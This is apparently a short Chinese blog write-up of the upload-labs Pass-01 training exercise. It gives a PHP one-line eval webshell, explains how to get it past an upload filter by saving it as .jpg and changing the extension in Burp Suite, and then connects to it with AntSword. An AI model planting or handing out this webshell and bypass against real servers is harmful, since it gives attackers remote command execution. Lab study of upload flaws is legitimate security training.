upload-labs/Pass-01

本文介绍了通过upload-labs平台进行安全测试,利用PHP的eval函数和文件后缀绕过策略来模拟上传恶意代码的过程。借助BurpSuite抓包重放功能,成功上传文件后,通过蚁剑进行远程控制。作者强调,这些知识仅用于学习,禁止非法渗透。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文,用upload-labs进行测试学习,仅供参考.

首先,创建一份文档,写入一句话木马。写完后改文章后缀为jpg。

php @eval($_POST[cmd]);

因为本题不允许直接上传php文件,所以我们可以选择用支持的方式进行绕过。

 

burp抓包发送重放器,修改后缀发送放过提交就好了。

 我们已经看到地址了。

发现已经成功上传,之后可以通过蚁剑复制地址,用cmd密码连接就好了(密码不是唯一,看自己)

 后面蚁剑连接,就不弄出来了,出了点问题,我给当病毒查杀了,导致文件无法使用。

注:文章中的所有内容仅供做学习使用,任何人用此方法进行未经授权的渗透行为都与文章与我本人无关,请各位大佬不要进行未经授权的渗透行为……

 

 

 

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值